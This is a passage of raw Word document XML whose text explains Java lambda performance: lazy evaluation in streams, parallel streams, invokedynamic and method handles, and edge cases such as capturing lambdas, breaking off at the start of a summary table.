          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reduces the overhead in terms of memory</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increases code maintainability</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6204F76E" w14:textId="77777777" w:rsidR="00E80CEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00CE4B9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F19E252">
          <v:rect id="_x0000_i1766" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="739525A1" w14:textId="77777777" w:rsidR="00E80CEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00E80CEE" w:rsidP="00CE4B9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Internal Optimizations by JVM (Lazy Evaluation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD17631"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some scenarios, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lambda expressions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> benefit from JVM optimizations, such as </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lazy evaluation</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delayed instantiation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB0146F" w14:textId="77777777" w:rsidR="00E80CEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00E80CEE" w:rsidP="00CE4B9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170CCFFA"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Lambda expressions are </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>stateless</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (don't hold unnecessary state) and </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>effectively implemented as function objects</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. This means they can be </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>optimized at runtime</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, and the JVM can reuse the lambda expression.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619361CA"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For example, consider </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>stream operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> using lambdas:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1B7685"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Integer&gt; numbers = Arrays.asList(1, 2, 3, 4, 5);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9EBAFD"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umbers.stream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A783A54"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lter(n -&gt; n % 2 == 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116267C2"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n -&gt; n * 2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07333CA5"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orEach(System.out::println);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53AA3E23" w14:textId="77777777" w:rsidR="00E80CEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00E80CEE" w:rsidP="00CE4B9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erformance Impact:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451EA765" w14:textId="77777777" w:rsidR="00E80CEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00E80CEE" w:rsidP="00CE4B95">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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hort-circuiting</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Operations like filter and map in streams can take advantage of lazy evaluation, meaning elements are processed only when required, rather than immediately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4408AFFF" w14:textId="77777777" w:rsidR="00E80CEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00E80CEE" w:rsidP="00CE4B95">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="105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rallel Streams</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: When using parallel streams (involving lambda expressions), the JVM may optimize by splitting tasks across multiple cores, which can </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>improve performance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when used with large datasets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C54AF77" w14:textId="77777777" w:rsidR="00E80CEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00CE4B9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F0C4173">
          <v:rect id="_x0000_i1767" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="77DC3C4C" w14:textId="77777777" w:rsidR="00E80CEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00E80CEE" w:rsidP="00CE4B9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Parallel Processing with Streams (Indirect Performance Improvement)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5702282B"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you use </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lambda expressions with streams</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>parallel stream</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> approach allows for parallel execution of operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CBDD81"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lt;Integer&gt; numbers = Arrays.asList(1, 2, 3, 4, 5);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FFD5636"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umbers.parallelStream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E11FE0"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map(n -&gt; n * 2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B908813"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orEach(System.out::println);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C1277C" w14:textId="77777777" w:rsidR="00E80CEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00E80CEE" w:rsidP="00CE4B9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erformance Impact:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471466B6" w14:textId="77777777" w:rsidR="00E80CEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00E80CEE" w:rsidP="00CE4B95">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="105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rallel Execution</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The stream can process elements in parallel on multiple threads, taking advantage of multi-core processors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B52377" w14:textId="77777777" w:rsidR="00E80CEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00E80CEE" w:rsidP="00CE4B95">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="105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fficient CPU usage</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Large datasets that involve expensive computations (like map, reduce, etc.) can be distributed efficiently across multiple threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641E8AC8" w14:textId="77777777" w:rsidR="00E80CEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00E80CEE" w:rsidP="00CE4B95">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="105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w-level optimizations</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The JVM is capable of optimizing parallel operations through task scheduling and thread management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BF12EC" w14:textId="77777777" w:rsidR="00E80CEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00E80CEE" w:rsidP="00CE4B9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4. No Performance Overhead in Most Cases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7745894D"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terms of </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>execution speed</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lambda expressions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> do not introduce significant overhead compared to traditional anonymous classes. They are implemented using </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>invokedynamic</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, a feature that allows for dynamic method invocation and is optimized by the JVM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B13733" w14:textId="77777777" w:rsidR="00E80CEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00E80CEE" w:rsidP="00CE4B95">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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first time a lambda expression is invoked, the JVM generates a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>method handle</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for it, which is similar in performance to a method call.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469F8368" w14:textId="77777777" w:rsidR="00E80CEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00E80CEE" w:rsidP="00CE4B95">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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ubsequent invocations</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are typically faster because the lambda is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cached</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70810B7D" w14:textId="77777777" w:rsidR="00E80CEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00CE4B9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437B490">
          <v:rect id="_x0000_i1768" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A2AB08" w14:textId="77777777" w:rsidR="00E80CEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00E80CEE" w:rsidP="00CE4B9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JVM Optimization (Invokedynamic)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788805AE"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Lambda expressions in Java are implemented using the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>invokedynamic</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> mechanism, which allows the JVM to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>optimize</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> function invocations at runtime. This provides flexibility and potentially better performance for specific use cases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154ED1C2" w14:textId="77777777" w:rsidR="00E80CEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00E80CEE" w:rsidP="00CE4B95">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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ynamic Method Lookup</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: The JVM dynamically resolves the method reference for a lambda, enabling better performance through optimization techniques like </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>method inlining</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call site caching</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD1C889" w14:textId="77777777" w:rsidR="00E80CEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00E80CEE" w:rsidP="00CE4B9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erformance Consideration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A06E712"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invokedynamic</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> mechanism improves </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>dynamic method resolution</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and can enhance performance over static method calls (in specific cases).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45DB52F7" w14:textId="77777777" w:rsidR="00E80CEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00CE4B9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816E5B6">
          <v:rect id="_x0000_i1769" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0A94C4" w14:textId="77777777" w:rsidR="00E80CEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00E80CEE" w:rsidP="00CE4B9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When Lambda Might Have Performance Drawbacks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F9DE2C"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Lambda expressions might have </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>marginally slower performance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> compared to traditional anonymous classes in specific edge cases, such as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CD15F3" w14:textId="77777777" w:rsidR="00E80CEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00E80CEE" w:rsidP="00CE4B95">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="106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eful lambdas</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If a lambda captures a large amount of state (e.g., a reference to a large object), it can introduce additional overhead due to object creation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CFEE8F" w14:textId="77777777" w:rsidR="00E80CEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00E80CEE" w:rsidP="00CE4B95">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="106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lining costs</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: While lambdas can be inlined, the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>first-time execution</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of a lambda might incur some overhead due to method handle resolution and class loading, although this is typically optimized by the JVM after the first call.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FFB147" w14:textId="77777777" w:rsidR="00E80CEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00CE4B9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1773216">
          <v:rect id="_x0000_i1770" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7740B5A6" w14:textId="77777777" w:rsidR="00E80CEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00E80CEE" w:rsidP="00CE4B9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 of Lambda Performance Consider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85"/>
        <w:gridCol w:w="5230"/>
      </w:tblGrid>
      <w:tr w:rsidR="00CE4B95" w:rsidRPr="00CE4B95" w14:paraId="48D3C7BB" w14:textId="77777777" w:rsidTr="00E80CEE">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="08859EBD" w14:textId="77777777" w:rsidR="00E80CEE" w:rsidRPr="00CE4B95" w:rsidRDefault="00E80CEE" w:rsidP="00CE4B9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spect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
